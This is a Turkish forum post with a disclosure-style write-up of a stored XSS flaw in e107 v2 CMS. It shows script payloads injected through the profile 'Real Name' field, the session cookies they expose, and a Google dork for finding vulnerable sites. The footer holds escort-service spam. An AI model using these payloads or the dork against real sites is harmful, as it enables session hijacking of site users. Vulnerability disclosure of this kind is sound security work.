ForumSevgisi.Com

  ForumSevgisi.Com > ForumSevgisi Sosyal Medya - Teknoloji - Oyun Bölümü > Bilgisayar Ve Donanım > Güvenlik


Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS


Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS

Bilgisayar Ve Donanım Kategorisinde ve Güvenlik Forumunda Bulunan Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS Konusunu Görüntülemektesiniz,Konu İçerigi Kısaca ->> Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS Merhaba, daha önce XSS'e değinmiştim. Şimdi ise script üzerinde XSS açığının ...

Kullanıcı Etiket Listesi

Yeni Konu aç  Cevapla
LinkBack Seçenekler Stil

Okunmamış 11 Ocak 2015, 11:03   #1
Durumu:
Çevrimdışı
-X- - ait Kullanıcı Resmi (Avatar)
Ruhsuz
Üyelik tarihi: 25 Ekim 2014
Şehir: null
Mesajlar: 1.667
Konular: 293
Beğenilen: 757
Beğendiği: 824
www.forumsevgisi.com
Standart Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS

Script Üzerinde XSS Tespiti ve Sömürülmesi | Stored XSS

Merhaba, daha önce XSS'e değinmiştim. Şimdi ise script üzerinde XSS açığının bulunup sömürülmesine değineceğim. 8 gün önce tespit edip Exploit-DB ve 1337Day gibi exploit sitelerine gönderdiğim Stored XSS açığına ve sömürülmesine değineceğim.



Hedef sistemim bir içerik yönetim sistemi. E107 CMS adı ile internette açık kaynak oalrak geliştirilen bu script XSS payloadları sonucunda cookie bilgilerini vermektedir. Açık, kullanıcı bilgileri bölümündeki inputlarda sömürülebiliyor. Yani eğer Real Name yani gerçek isim alanına payload'ımı ekleyip kaydedecek olursam bilgi veritabanına yazılacak ve profilime bakan tüm kullanıcılar atağa maruz kalmış olacaktır.



Görüldüğü üzere
PHP- Kodu:
alert(String.fromCharCode(888383)) 
payloadım sonucunda char haline çevirdiğim "alert(XSS)" kod ekrana yansımış oldu. Hadi işi biraz daha ilginçleştirelim

PHP- Kodu:
"><script>alert(document.cookie)</script> 
payload'ımı girdiğim zaman ise gelen yanıt şu şekilde olacaktır. Görüldüğü üzere cookie bilgileri ekrana yansıdı



PHP- Kodu:
E107_cookie=1.f4679fe6f233efd5207277536bb4ca5d
E107_cookieSID=8unu5go6q51vds66oal4cq5nk3
cms-panel-collapsed-cms-content-tools-AssetAdmin=true
Bu anlatım da bu kadar

Yazdığım exploit de şu şekildeydi. ;

PHP- Kodu:
# Exploit Title: e107 v2 Bootstrap CMS XSS Vulnerability
# Date: 03-01-2015
# Google Dork : Proudly powered by e107
# Exploit Author: Ahmet Agar / 0x97
# Version: 2.0.0
# Vendor Homepage: [url=http://e107.org/]e107 v2 Bootstrap CMS[/url]
# Tested on: OWASP Mantra & Iceweasel
  
# Vulnerability Description:
 
CMS user details section is vulnerable to XSSYou can run XSS payloads.
 
XSS Vulnerability #1:
 
Go Update user settings page
 
"http://{target-url}/usersettings.php"
 
Set Real Name value;
 
"><script>alert(String.fromCharCode(88, 83, 83))</script>
 
or
 
"
><script>alert(document.cookie)</script>
 
 
========
Credits:
========
  
Vulnerability found and advisory written by Ahmet Agar.
  
===========
References:
===========
  
[url=http://www.0x97.info]0x97[/url]
htts://twitter.com/_HacKingZ_ 
________________

Sizin İmza Resimleri Görmeniz İçin Yetkiniz Yok. Lütfen Üye Olun.


Noyan..
imza
Alıntı ile Cevapla
Yeni Konu aç  Cevapla

Etiketler
betik, çapraz, cross, e107, exploit, güvenlik, hack, içerik, saldırısı, script, scripting, sistemi, site, somurulmesi, stored, sömürü, tespiti, uzerinde, xss, yönetim

Seçenekler
Stil


Saat: 23:59

Forum Yasal Uyarı
vBulletin® ile Oluşturuldu
Copyright © 2016 vBulletin Solutions, Inc. All rights reserved.

ForumSevgisi.Com Her Hakkı Saklıdır
Tema Tasarım:
Kronik Depresif


Sitemiz bir 'paylaşım' sitesidir. Bu yüzden sitemize kayıt olan herkes kontrol edilmeksizin mesaj/konu/resim paylaşabiliyorlar. Bu sebepten ötürü, sitemizdeki mesaj ya da konulardan doğabilecek yasal sorumluluklar o yazıyı paylaşan kullanıcıya aittir ve iletişim adresine mail atıldığı taktirde mesaj ya da konu en fazla 48 saat içerisinde silinecektir.

ankara escort, izmir escort ankara escort, ankara escort bayan, eryaman escort, bursa escort pendik escort, antalya escort,